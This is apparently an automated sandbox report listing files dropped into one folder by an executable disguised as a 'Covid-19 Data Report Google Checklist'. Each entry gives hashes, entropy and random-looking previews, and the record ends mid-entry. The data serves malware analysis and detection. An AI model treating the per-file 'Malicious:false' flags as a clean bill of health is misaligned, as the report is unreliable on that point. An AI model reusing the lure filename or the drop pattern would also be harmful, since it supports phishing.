                                          Preview: 58KiI3D442bIR40s318JSY885n0bh27W9D..5Kp2D299vQ87A5Gpb4lC160l9Z797rcw4Z3ug37322Oa58EyBm9S9aJaYMv1Rw39uUpC0Vp0QkSj562pR1gMFi0B392Up85L8a010j9Gw9MzN..6QkE3y54q093F09jg5Jd5M19res0rJiO7007ij1Oc310R27u1j7C4844L8x7n9XD2zy19651P8Du75a83UwUD71XI5XbA6317Sgt7z4f4vF4c9d590eK87617F665hvvwK..47Bkyv35Z9t127V17QS34o9y8A4C5adO836J9Cm98..06bJ24s4V1b2qf7352CeYdnv5Y1H6ZU883WO5xBQdWI39U7PYN12cIg583cXC8wMCcY33r8N5eFmdz591FS6kb16SL6f89T36f83..22b484ik2i1699O00ChgzDe2l4X6JwaNpL44UO5xo45EO97JN24479371rB8f..902icu2i9CLRNJ20J51Bicc7A7xdR939AXW2THaJ21988..
                                          C:\84086963\bvtxvncl.pdf
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):524
                                          Entropy (8bit):5.434340036552141
                                          Encrypted:false
                                          SSDEEP:12:40NkWD/VadL25qWjJTVzVIGE0q5l1JyRfF8G0MblQOEl:40qV25qGTVzxq5li3ZfEl
                                          MD5:5332AEA2F5A6A2FC6BDB82B8D57B7D25
                                          SHA1:8E605EBF5C2A4D10D40088C1E0D08AEBE82D0E3B
                                          SHA-256:F684669415866AED08165966EBDF9D74EF4B0753583F6B8C1CB62ED7AFE6703D
                                          SHA-512:524AC046727C4822C8FEE65A1D13A9694096FF5450886EA83AE5B820BA2F2343A32A4EDCB940DEE50E249DFD225F52D4036D3ED970081B52D71A19AAA5C6A275
                                          Malicious:false
                                          Preview: 66400Y7d702A51728u5w11y142305586w04D0WK267t3sD44..y60i2CQ5c7979vDbYN521DnHp78JE4U5005Gxn715y24gSDVO7COKM7..m0w123tpBu4X68cf9X56b8KBao1Om9wV54XIc7sbb29c3tDA2mJA0U4x4259946JED555kkMUp6JekWU48n764v2bjj408f92026944u709P21541t..CI5VA1K67MU3SxT9m627d69182KAd104EGX5x909q4BqwvSr6Kz8qy..188F309g809136..772277g938oSMyAhGSqgyzk324VX937R1791g2q09z..7KL9848X320sxZr7r52qrn7jI2LL..lw29K1f29T7R890ZX8Da7Gyf19q0eLC..q619igau0qEkTsz358U4Z730Bw556a8O599c792B1mUS6djB0H6C6260IW77227SS753L6H9N38N1D190OWf1L5B6L..1e426DEsS718BCR3BTM5s636FIP2..
                                          C:\84086963\bwct.cpl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):647
                                          Entropy (8bit):5.439107527197963
                                          Encrypted:false
                                          SSDEEP:12:gYuVI4OCySSfo+bVH+3Znh0gJDx87LbnRlaSTOv+0zH8EZsOqpCiTQ9ATBzy:ruiqySSfrbVH+9Ubfamqj/B+TQOBG
                                          MD5:2E644D5400EF129A503D0871A62B91B6
                                          SHA1:590398CEECA298B6AF6943EBF6944624CF720E9C
                                          SHA-256:EAAC7DA6F8E158EF5E32728C3285CF8DF9FCC9E240F89A449BCC0C040D4A8718
                                          SHA-512:12B6F07541C9442B31887EC5E316E7F3B22812B929E2A7E42BB905C5D92DE57AB91C0C3519DD5CCCF728109F777E7F3AAF8D52188CFD9C876501B252EC6674D6
                                          Malicious:false
                                          Preview: 944sBp7c0475BK3588b0o7l55Rqym7J2eY2Z8dk3ea8ff1I4sL627VbK29831II1N0988rY852V3i3w1o2v0Z82849XJVm9B24G8r..02p4314IhUN1244..51x5fuu3b78849p1T84f81lHgr8Af0A259z7S711m12v6zF86qcNBc5l7c91Q9613n198926e9lm0..s0rn4I8Z71MWX2u72lZ5u50K58956YN5uMERE1GP3451Z4000tq0N18D0PWWx148fim1r005bv370c4gZk8l5977mk401z1b41o78n5aB3Ns884q903Y895vWA..h2v2403AfI9nY4D2sR01H7S8nv47..crUl26Bd972A1HbQi128Lu5c905syiVg11C8Vob16d1W6o95R15e2GKJ9SN2B0h67x1i837S7oN92ae28T916L8E1675..L57R4zTdkKe6B7Kx7J701T3MNI5nV93s3p6c47y7m0BZC..iLi9..5091uH05645095KUdS8BFQ6H42i388793Ozh7G86PpZ203BZB2v2hf1x5RU0ZvD8b27l8Z7H9SJ4apKGV4274LTyh31Pv6f29tkdI19rL38g50Cb7Lu8l4688R3S1eGVHX5rp2ei5i4p9il6h..
                                          C:\84086963\caxangvd.jpg
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):581
                                          Entropy (8bit):5.464117647486144
                                          Encrypted:false
                                          SSDEEP:12:eHCcvQOngypyb9A9EGT5rxU7XazgwNajKtDB6OWm11Xq+NLhu:HcvQOngycxaEGTDU7UgwNajqWchVu
                                          MD5:5176E0EFD1048F10944AF4780BDB7806
                                          SHA1:2948F0C3728B80B2BC34A05302791F4ADBD90EDC
                                          SHA-256:2344A23FC664E82E7241895DBF1651CF0D6B664E0B352300B80D35675A0763A0
                                          SHA-512:52A6A163E32E303FD2257209C8CB530ECED109FCA3B8FBBF7BF1BA1E43DB152A47F997C36385BD984F6FCE55F8EACC2FCA85A62AA011BAED5C7609CF302BFACD
                                          Malicious:false
                                          Preview: 0U077t10Qi4460v2RL4Z3F8B53P6M9p3757J9TdZ79086v221Hot3X4813v25Z4m7K6Iq99111Y2F5z0nL040clZQ1bm1E28298K05MOp20iT23D66Wpp8jMx8y38805K7jg91085w37zO02hU78IU3Np5g2SD9us1N78X56z..dbP4J9q164708N592gpg06WI6820Ue2909nqa082Vb81842Mrbo20e9h00yJs5Sd4Kt5y41096c61FU2zQj720S6114Mrk37u50u6OV72W8QU7rG1hJ145gDp8R4wTdV9LqJH02J628RL6M525sb9491AB292Rv..19V9eX6Ozy72Ft261p9L5r5gcIW5N7mfF7A2A858236tgc1C57r77LgI1Oo6L803SKafCAlSP2T4z85HAG86..Pu0H60z42TPba6aQFdeW09fny9eELv7h23U9MR8SKYm..HnB0395IH6013D5e2..5x1663y97d64on26u6tm06x11c3h9i71U0qy6f8j13lR917e9f4i41eJ67O73NW6t8368bQwz6p8Q73r5OX5l4544560DGBh7..
                                          C:\84086963\cjsqemh.log
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):540
                                          Entropy (8bit):5.538256434964563
                                          Encrypted:false
                                          SSDEEP:12:GVoMayFAFncTbjGvnAjSN90um9BdMryf8Pgfn3H:DyCFcTbjU5m9LMr8+gPH
                                          MD5:DC3725E9F0AE851EDB710C412B969C24
                                          SHA1:D674FE9530F13871D69A947EA40FE8D805D2A738
                                          SHA-256:625EA896AE8DAF6803B247D806921E48CED86611F58BF5719A3072525C8E54A0
                                          SHA-512:A36535754AA9A89F23E89CD75F514FB06B8AD3734B8F75295D3C90B349F993C1A7206AB764F7C7A377F20200083535F23A7072F29E36CC8F76E3A97922E8A0F6
                                          Malicious:false
                                          Preview: 1US4nK9n047R43g199fap916mXw8QH2w87hr2oDtc8a4h86t22..0S83090Q7i431tJ2fVsSal204Z228G91a8PTw95y65Fv3w18wS9Y6m5311Y1m51coJ6zS9PnuKg5pG6y64870g0ir8wB2709G9Evp03aW2Ol2oE1Wf..67j2Iyp7jM9DA743c7H6vs70V74U1Py8u80Cjbw301W3OW7..62j5MjGLtGWJM2LJLsC54P9I6897w6o782dO8Na9236qGtup46gR2ckze59l79AD1970TC7..7KW5FleE0k0..Z20Mvyq20tz683011eYMg333r1Qc8j44E37II612A..81Yp1Y2h59..X63uN036Y02cy2u1ie5429h8e82N0W0Z35h6nk7w8s13044xQUc3V9lZC79653Ebd7egtQ3P5g6t97lVKV5P0991Lryh6qn2y51163m4FGX1yY0J51d1Y2YVo2vH0kePRWe13X898..t1v17ar7uq053pN8xp1vSAakUP574nP233d3gmTC9..
                                          C:\84086963\cprgmsqr.log
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):528
                                          Entropy (8bit):5.496681948912632
                                          Encrypted:false
                                          SSDEEP:12:jSneKI0mTIlBRV0h3/8sJYTnmD5BTsRSVyBTnWC/xcRj4bY:jSnIJTIlBRCh3/8sJIYNsgsTWG6jB
                                          MD5:CCEDFE91BED4C52056015BA0A1A0D5C1
                                          SHA1:2102EFADF99180A8FCDD4DF8E45294BB2B661E1B
                                          SHA-256:96E77C0B86DD5CC9B7AD385359FF909A1C31FCE14DA48156B001A6877E027180
                                          SHA-512:BA43247150CB3809062502599E645E72AF0DC19305B92C82A69D917D59BDC00078A051D2E46B18DB2819418070ED981F929FA71FEE73A7E99C353BCFC6A7A72E
                                          Malicious:false
                                          Preview: MrOk0dr362S366K3j0Q341hf8Cqhgn5C89IGD281L3DQi029uiOf599s7860816MM99IhC1rEQLiX3K9Mpu8QFSHl7K74mb99n2t5c17657M0CsH2G545S4538qiwnU3v3e1TBHqB1O9F7Zyv1yM6686uo06E7677aKmF87i1cUnS4n23R0M..516379or489u4cT808jP81xXfXYug873611CBf3624yF1h49w8nye402M9E7pe280cCI8EsL4t8w54Y20km213zx74R8YYL31RXa67CLB5qCH7u4INfK95CH2kdi5fC247f..d9E5Rn..70a46DQ99G912e2A895O2r3OhH78d64m1cCW16cpH6050Ju0282H99q642536z1xs25U4xwr51c..4lb4s08Tax4gF0fKr33r2V1621MQ52w4o18xyss6aZs41N4f870..f750Zxk29P34vAdReVj5X37B0NiF2738smwzx8yiXseU3I54446LrKA580fgB21Xc119337C7..
                                          C:\84086963\ddbtbulv.xls
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):542
                                          Entropy (8bit):5.443797013815
                                          Encrypted:false
                                          SSDEEP:12:Ef5Wjy22V9MTWx39JAzm2cqPb1AFeoWCAp15sdv:Ef5WusWx39JAq2cqT1CeoWnOv
                                          MD5:28A09CC4CC345C7D6E4A956CF2FD71D1
                                          SHA1:FBFBB038FA71A3842213F9083227E51FAD7C349C
                                          SHA-256:0698EC376B649131E51A81E26538D966CD07EE678272ED78A907EB70F6411B1F
                                          SHA-512:37F50C568101B003E87EF760AD4B57F912115E9CEAEA8E16CD3478C4B3F764F4563D6841B713F06C4519BD9FB2CDBCA3E548E646554442CF8FB1763BFF4FFF44
                                          Malicious:false
                                          Preview: Yp1x3r88N671yuOAGDV6hTR..1897zK6450H49mhg022C86F12EbZM301tX053G7O0Y07vL5TXt57PB99eU6in37q5e9ZsN6g4N0135Rm6EPA27bxNR1J6081D..83w46P43V485ZSV84Tq3d90wC01C3O00tqr40C344Rf4gmH97i4514gg7756F7On3in0293K8pz95XN9G4iM1fX5yZWl..vZv997EJ41zn492..288N7pLu63p6V143123mvzG0196HYnssb54h1N59VUhB8d2481b998n05GVP707gjMB10Q21R263vOSc9d734V08n7s4LFgh635z1ZI2r84031k5c3KH5590640d07507Dal04O7743v9q4..aAe877f58Y72B9ls50cFFSzdHYg0nh28xKc5fjw2iqtQB2i91ANyT946J3044E23617pb8P34872IwDs576Q599U83U65..J7240v4x5itTa319fGp4B402504V2FCz5jDc2mm9E9j168srg9dL0cd256Uc4n387..
                                          C:\84086963\dpuanfml.pdf
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):518
                                          Entropy (8bit):5.533464997492796
                                          Encrypted:false
                                          SSDEEP:12:Q8de3IZFNq5ZZzH0mkjYdaiTupE7pjI2FkeEM99l85:nyCFgzQjYdDTupE7pM2ZJ+
                                          MD5:2E6C6DC67F8592408065870AD1A64E97
                                          SHA1:B169A212D6050FE7217E16C95B9895C83320E1CB
                                          SHA-256:DB6E38036E234CAF0EDBBEAE92CEE8FBD0B3AC4F165B4C8D041A7276BF211F9C
                                          SHA-512:FD0CC7C23F8143AD001AADA95225FCCC73BD178315C8A998941DAEB12193EADCD39E5B64797B4370FDCB9A915826916A22DF887E802683D4C7C3C6939AF570C8
                                          Malicious:false
                                          Preview: Gfz579q9v2X08U56gXKA1X7X..HmCX463q224a52i602ern8Q4K54715h2H0hy8Q6rX5z865Eeh6p0B340za6DQ70PYlX01596HRW1ZM5o83jK97dwLdvHO4Hk..VLJYh56J2neG967544B64Q9841G7J774M161NU041694I6E0M40WHDQ31N1l16A2hvD1M31A8TWY6TWP079CI6..P5n585C3JyR8I444Kj0T9Pc98WYkXKq41Ip4iS1H0534crIT92W13l0030ECM12Y8pMEB..SgNV11jcVYH4C832NA62iy0638l886579X9..D51wR2paa51196ibQ3LfU8Um06te5Za9MCxvmOViV41e81i8T3903Ee3pituwm8y9A6B7NhPMJX0w58M85YGqx3L186wqdOUDoDKFA585BC32iUZc45e1355BAhlI072B3GR27Z8pbw56f2k8FJ0m4VT..672KYgRCE494e4..GA2X8d59cY2w0Q540InXZ14960..
                                          C:\84086963\ehlstvqd.cpl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):524
                                          Entropy (8bit):5.598448622073757
                                          Encrypted:false
                                          SSDEEP:12:ux5Mdg7efmzvDeUDljANsuabEALxeCUkAOjWW1o9Wkn:+Mdg74m//1l/eCd91Un
                                          MD5:CB99859554154D9C87E3581D8224DEE0
                                          SHA1:57DB444780C77B4EC1233BC6233E2BD313E5BA46
                                          SHA-256:CE96975E576F89FC2076B9C12A3D98AEE4982D85F6B7BFD718C55EBD3CC46ACC
                                          SHA-512:113E0D88ABBDC2EC281082413CB43B7D93336F7584D928F45B37A4013D763DE5E8F9E1DA7398698A8477B0F8043C464417A65FD59EB26A8CFF76C346D350B9D0
                                          Malicious:false
                                          Preview: 59C68F8IVXq4N5k6zDt8V51F4RB075K7X6ikSbsv3iTF2I5730lLQ..0J75h38vR62P4443816U1M56FO78h8bL8H399Zuqi74PiE3o44h939Erh8aS65N383TMM040XIgc3s6N768X5bEZ3Uw9Y6a49rdL0gU1fcHx60F339..361VN9E6w..GAtCNM5It..qGUw27Yg53B7hrx790k4m7b67124Zf18ct35tqX84bI14IMp856vX568J9V77d1iPW86G3cCdX27u0L242cpc8HQUc1gNI2v12h66K72Zm98r3418iBh2P8x42Me00Y8M50a634rp2uKqG8v5ZffBje88AyBapp3G0JwMmZ0o06v2v8c8Qw17FgWK3..AngLhW1A7wLd96PdJu2I8101zi24SCy236..Q3Az6Wys948DMq0sn0RTa08d6E351yE3pL4LU4D2hz9IRo2pcFhx0q28Yx154ckRHR0F0mlSFAxy1yyoy2D31Ml727938rJ95q773W991..
                                          C:\84086963\entnulrpup.log
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):514
                                          Entropy (8bit):5.408371409752931
                                          Encrypted:false
                                          SSDEEP:12:7keCzskjrg/oF4JHtbyyWOsRwykl3QLqL+1:7IsQk/UqtvsA1S1
                                          MD5:0834A11E2CEDDE6E8EF898236F5FDFA0
                                          SHA1:D90836C711B4C84048775390CB541A15B628EF46
                                          SHA-256:D4C46C5676A40E04CC55A8391F91751BF5F7F70503F91E2914B5F6CA904A1D8A
                                          SHA-512:53D51AFBFDEDEA40A1809F4235A2463E408368BAE2F0E769EEEA4AC2FCFFB293FF5117EAF0C2953E05091CF6927D94F7F8AD02F0FAC6BFE9B5E901A9994F55A0
                                          Malicious:false
                                          Preview: T685513X0vlE7op34Mo29T9v709fbXm69tS03G0R7Cr5dr9OX8Tn76Ehg36999W400FTY7493k455v2ILTZr7gu4emS2453mWr35c2r3..7e838h..Mw165Mh293j741n46n7ja..8Jh21c8j1eZQ953v137a298z47r2Nj0vbVjd7JC1I69v5qE8Id10xZJ302VN685T4zX85emx84386Q8pJrz3wb401XNIXgx85d3176972548337SZL1wD3M96942w3v1e9Pu..4Pi8z2Ek00Rn8cLN7B62zow51PSmx0008L6er5qX79F46ly3T9h3z633xAZS6vgEPRH24..s5475K7g07a465I514V153U9d5971x73tej6T6oF5uKyF7qsO66OU67L27gb49O62f4g5GhW0746FD11g7a32FwT88E65hqkFZo33cN5K6O2B70E7630..8o881w98Z3N68227jW4096062K8E2a953NPRMtFGM3d181967H9R..
                                          C:\84086963\facqhk.xls
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):586
                                          Entropy (8bit):5.601256233916398
                                          Encrypted:false
                                          SSDEEP:12:uvrdNyqBAD0eBhSh4D7ca8RIK4oVHovxNSCNpv6CC6YAgfZwJ:uv7bq3Sh4chhzVSLSCNErmJ
                                          MD5:EF44DD9DA222299AF358F4B51C151DBA
                                          SHA1:94AE0F3F591069607F39D1D6D1DFFCA25AAB08BE
                                          SHA-256:DB8BA5A88DD3867FC088EE24CBED5F53DE354FA54C04CB0FFD7F2C9C87DE14B5
                                          SHA-512:AA3DC0B5189D4B516B2AF918BCD067416561598741360592A269083BD116A3C5AE8B4B8FCE346692EEDE060C6A1E8D05E7230AC4CD6ADA5A24F3FCE862A576EA
                                          Malicious:false
                                          Preview: 1173gJ5Q4io87747tnpSlP780mCm6B7148cKk6ua7D6iRf4m8c8Dv75dBY1fO0099E3794v4f32GX3nOx4Uv3F0Wl543b..ulA44006Hh468ZDt168cJ3Le1t4WFcH4wqRP133..Sc025kaB2jM41Z938Y714895MG4jgH4DMS4wS53RE890Y50..8CgK0..6ZzhUiJi0kS08679zsv7733k28e5PS5tW8005RF9UK9asQ27KYkq959n62Wrr5JV8mGOK32r22o3O2dXC9..E25U50lbL7MO77u1Ptu2P3359x5b49nLk8mU3091wMDjM89fEYI5551Q9..h1gf5jJY0alA91b14J7DV7261fKA9D2yT416YA39x698jeNLuFW656roIMV92S9..8YJ2h8285d1..pys1RROt1UT7p0UjAi4Cs2XI0D4R6mlb5r62byv1O5Ib0vuyrY6UaVonC4D90sv70mp44m554a0R044535Q6qzo0LXg1y2uf2SYfW057wogZ18t648N86a981qA4hw16IQD57EnAG5eo77Na9F0Mv722UW15U8W103W2BVo46jp..
                                          C:\84086963\fhkrwrwh.xml
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):606
                                          Entropy (8bit):5.446862383014172
                                          Encrypted:false
                                          SSDEEP:12:aXbcvcn6HVAExpVS/S7H96zl19AsocbCrg5Vo8bsj5Q5oWMdnEEZ8C3:aXbcvw6RI+Hm79T1Cyy9MMl
                                          MD5:60F2B5F5B09998A3051134C6DB2DA917
                                          SHA1:5E228EC1F5DB6CA678A2277D444D203022622366
                                          SHA-256:27661CF82AE6A5BE2D83D0FF76CB07C07682800B611090CCA4A7B9FBB0BC6FDF
                                          SHA-512:6D8880CFBF1F12EC7ACA097DCC46AF35321271E7E8D8F1E3553BEED3ABD12C6B35E7464BD573E72A30B6320E86D90EFBD922B0DD58774B2500F7094631965052
                                          Malicious:false
                                          Preview: f0hO6Ge41t4Q35aS3m7g9..3Kx5m6m5x381F0d4gGT7iq43Io7499205167111GOO24RDz9s3A18P3..799Bguw6h901256Y0zf023q95016i597Ob967XS905091Ky1I628M72e5jB3I5968G1NUXvgaFt9..vdzM826uRJg910B763M463G6068Mb78G348968HVanlA1Dsv91q39Z3529h6FbTf4AmsuHB9S5LPdly9Y1xDS930sBV37X9z8x8..fA37q59845ZK1l47mj5GRliF0b4k4K2162yzg6E0F5091Sm75Xrr1Q64MZp318mX145V6G3Z77006tAByTg98cJk5ro581..d94f168EOulRuxs4Gd0057Tp1z5ynI8f..b5JG75Ge6c6p2Iv5k8952SV7M12q1q022QGlw7xOKhX1s817bAS0Uch52E..6803087hwr4y8uql7wJf944FcT0mm6c693F98uM4z08h258T1Rl17199a6iw41tY02Plv23BxZ3j7MD176VK4bg3UvVQ446ds7456U8Sdu12u1p9K18HDBD0w6p10H78911KsnNV552MbSL7931110LlO93..
                                          C:\84086963\fqficjon.emu
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):197597108
                                          Entropy (8bit):7.092598836337755
                                          Encrypted:false
                                          SSDEEP:49152:aBLBnBPBOBIByBTBzBCBbBTBZBSBCBABmB6BXBABEBJBtBuBZB1BxBgBTBMBbBSU:e
                                          MD5:48F2E01CC5284AEEA84545BC2DD28D42
                                          SHA1:21A35E7AE31326BB947424629D987AD55842F38C
                                          SHA-256:E56192FBBEFE34A1C3D2A685224D3AF9A17BE3F02664DA5859368068FDDCEBFB
                                          SHA-512:15AE2385EB73A6D1F5EEA688078204BDE4D0818D4CB3737A5F50BB2FAD5F301E7A721EDA6D727227FE75B2796C450507F1123A497E6D65F4325C0C19BAB8A6DD
                                          Malicious:false
                                          Preview: ..;..>...fN..S.,.x.@.....?uG....Wq.d.bQ.Z.Y.H.....d;..mns.8YZ.}.1k.&...o.....?-fd....X...PF2...[>.r......=...K.nLd..H.*\..L|de@.#>..Gkw7v2......d(.........p.$b.L......[...Y...M.{..b~0:.........#.c.s.G...q.FX1.&.N.5r......R....=.O..L7....7.m.i.Ls.'..*..|.@!....!...z...x.JP...CcR.n#../r.x~,0B*.3....wy.>.... ..2.A!......Y.......$..7k<E..g.....].TB)..........y.J....F.Q........M.y2.....H....a1z.*.@_.y.=.l..*yW. ..a..g......M.6.R.u.8.7.W.....6.a.r.1.1.C.4.H.g.6.1.Y.8.4.....R.".9...T.....W.D.y.N..\:q..y.Ix>nb...h..,.E. ..X.......Uc...n......<e.fnR.R;..|D:.{t#..3.#hwK....o.0.r.3.1.6.Z.5.f.B.4.L.B.D.8.7.v.7.6.3.Y.3.9.0.3.4.5.7.S.....o.X.9.K.5.e.u.7.9.R.1.1.......x..n.P...cq...@..S7}./.2.....:C.R u.x......PU..M.^C.....Ft... X....s.b....B.5.2.6.Y.2.x.3.t.C.u.A.7.9.C.1.H.h.m.Z.l.0.2.m.p.q.3.M.z.k.8.7.7.6.S.....1.y.F.9.b.7.5.2.N.7.k.7.4.2.2.1.v.T.0.T.M.M.L.Z.3.Z.5.4.K.V.I.n.0.1.9.P.....r.0.z.D.Q.4.3.4.6.8.4.6.E.h.k.l.7.9.2.X.p.A.m.9.e.5.g.P.0.E.3.2.....#AO .4$m.C.pi...
                                          C:\84086963\ghmpg.dat
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):521
                                          Entropy (8bit):5.462884504661737
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ABE809BE7DE12444306AB93851729A3E
                                          SHA1:472001DD80F12DF34E6F4342607A21116C57FD5F
                                          SHA-256:5E951724025469F34BD9378105462EE4159E25DB3C469AFF1A0EBCD71D588734
                                          SHA-512:3A3A59A908903E97BA9DF9C8FB9E0282B32FE97BF78C208F117360E355AD0EC2C3BF8206659DE1CEE8CDECD559437D47EAB6AD3E48169497B771D5FA48A4DD11
                                          Malicious:false
                                          Preview: a081o263Cd9yWA0v6rjs5DM5Ax08wS7yb9f91Y89e1My6587Tx326I84XEwj1q8005EnP7o4A98K9sGsY8l2W13n0Y4Vg4352wCd7m3h0ExaQ19V87CHO1Q55c3648J2oe847BeGTq6wmh745U50493l5l3..w6W0868v3Ou793l2l6zmzjzL4F548qem..58caqS6977ez6TvZwAad04828525JjIy4lNYow64446gu400G0l1y087MY5pYExp19tsQu8z4675329276RFt77JO70po0wKN542q5KuL1z893PT56SK..ywWt5qo2V2r83rggFY249Z563f0809i4GQ347ZD7bY77675O24U94584VvMMzJaLip55LD6vKl9cG88B8bsH4xkDQH73K9302Tb98Gu2W8R9044725u1hb936Nih96Fc64qoL7li7512FXxw588Q86..oF6o22E0409423H4lT2d07Gh1k1Q30545fh385L05Q9JPbg64M87GgW54G..
                                          C:\84086963\gmktoect.pdf
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):520
                                          Entropy (8bit):5.510300564049379
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:23F74D087A46EB7C37FF35CC770DCFFC
                                          SHA1:9A089C9D080C895ED88DD8429248E03C87974BED
                                          SHA-256:94B760BF5898B801B1E7FFAFDD0C2E0ADA3BEF8D250BD15DA7C780E79D05FE6F
                                          SHA-512:348F9C1971F4DB32768BE2522501AA5D7082ADB434710F07BBE4C5E737A30E69D89E93306706F9E1E116328BE9B4B5F38D21E8544C7430F0E13E9781623E78D7
                                          Malicious:false
                                          Preview: 3OFJ60H5Oz11K3x31FbSc75023mXU6A7Y3l61dZL38w7OeA4428T6..2ZH4UC86924y972Oj4t6rEGfgLbIe6z573697IL068h5sbpTvMVjj6X9ao2L9j0d44zeUGJT1DHDo7PhA42QXoB3a3mcD3o7zn2e7clK6q1G811c532L31bX04n5al7hF5..J21MB51622g67RU9v6D485..7w544E568862iLC1A35g4Ei81B20Kb3EV7i77D6C50J1u00k3Rg9yR9378s32a183i4d6sAGeWmnXnP0KiaD91ZO8NFx2KuN16gKk526G2E9i1gnsw07m648697qZ5kW6Y5le9D94Olv..39p7LLa24m3CSg3m2i5N9D62f1c81190l63E6rUr77d5B6K19ew7agde5K61Yes09..I646YK28kY2925ttTqO80706YHr5o60k3v07P6f4IL5FB7t0p782Rt45i1151HY74V6t87DEpJV5Ee683N9h4B448r910yf146..
                                          C:\84086963\gnqknrkuff.xl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):505
                                          Entropy (8bit):5.431892714534565
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:59FD4C0AC4EC228EB46DC54D4D05BABF
                                          SHA1:E8E34DFD798A8EC2B13951AE7189979A00DFEA0A
                                          SHA-256:37489AD0B39AB133E569237105882A0E5130E308992F6D0E10F7B3E363D045EC
                                          SHA-512:CCE2FA1FD16B09F492E648302B575A2D43CC26C46769D2068B089BB0029CD8746A2FC2DD52FCBCB40CD1DB34D86EE491A593F8194B42ADBF49D85A727147D5FC
                                          Malicious:false
                                          Preview: 0jPdEFmU4fm334T0h6752219GNO8o3IC29E49P82oMorS2nDS825rEHTF221S6532bsC7318rNpVW854vWHl944336G30818lPSz25em1HB..2Gw22O75Y7800e693n7aK342Uj8Q97hK0506P5at98mwQ6960118155oo588J1Y7z4l9SN..o9JE6R79i9T0f5m36f9d74hgm4x2mswt8Fi2X155q96n9tJ3g823ow7Hn94B2ym29iB8d7f6y42R5WE42bsE3M65b1f3Uo82PyJqI7fb9nVjF6X13E5NL74D0D480j7Wf82lt2K9R06ZCzbYy4Yd..88q2g9kl3J3K4xC545Fv40pu8cF8N939ADFRqKG14zZ67m18kx5Eg6ilBo54H1x3jC8NF71560P1z4I4kok6330z52888K84a8l3Q5V71Qz0I7DP960F8JT9Y5n8I4EIjv0GU7P04f420wt3V2534..P43f482668KV5z10714o7..
                                          C:\84086963\gulmmhfj.pdf
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):530
                                          Entropy (8bit):5.454725356689082
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:678ECBB89707E9381F6C13C2BAABF8B0
                                          SHA1:56A9680B0C9B041F2959E2E1113DCC4C4FBB3F88
                                          SHA-256:8592C75AE2A7DA218FF8BF9A573143E64C88709A8A9AD987F018621B06B1E0B2
                                          SHA-512:025CB65C45F60A6469C61D592DE7D58514FE6D283E824C7CF7984931BFBD4E6299521CFD7D7EFE08DCC734C34EF958775FB28A49A1FFF3BCD11052E37F69508F
                                          Malicious:false
                                          Preview: d4055ivyqO94W0kQ838KP48W7CT4939ZERd50953t4sLcX402999FoAb5973btv581FG96S1WH2xB4502O0D79L7J64l84tT542Z1528jf..98Gm6I49..x0JX31hy3k72GEr81215Um9626kQ6sqO60h0L520i2L8n9p14f6b0v3SMN5H3NIHdcs3044zP199C9zaUK4649T5f57..891124S2g722M09469779KiS0S71RD7iz3F52w3qpwvPz1259q16iXcoh47g6J5AL061Y01TV28j33334j7z8RS72Bu3x1aA10RZKaT9t7MU4Ya9d099C998ayA435V84nWb4K4qTL..x23Oz2wf511FWO8745WEAh1ilU1NYTS74f76L6TFf53qC935Otbz6u2k1..p2d26fLM5J2w5420t0q0343v43B0r4f7QM74Ta1RiP4Kt83LnxVl2NL67g2j64L412Dc2w60kCLR65tV9v1Ic1298J35ko4Ju3o4701SbDifd4SIr57rEK..
                                          C:\84086963\gwqibdlqs.txt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):547
                                          Entropy (8bit):5.580061349750094
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6369B9AEF7FA372655C522998BF7C3BA
                                          SHA1:B377C3D756383F83270A126BA76DE48BDA81ADAB
                                          SHA-256:49383B9EF5A52AAE781EDEFC0E417393C5BF94766326280BBA98F6CA1F828AA4
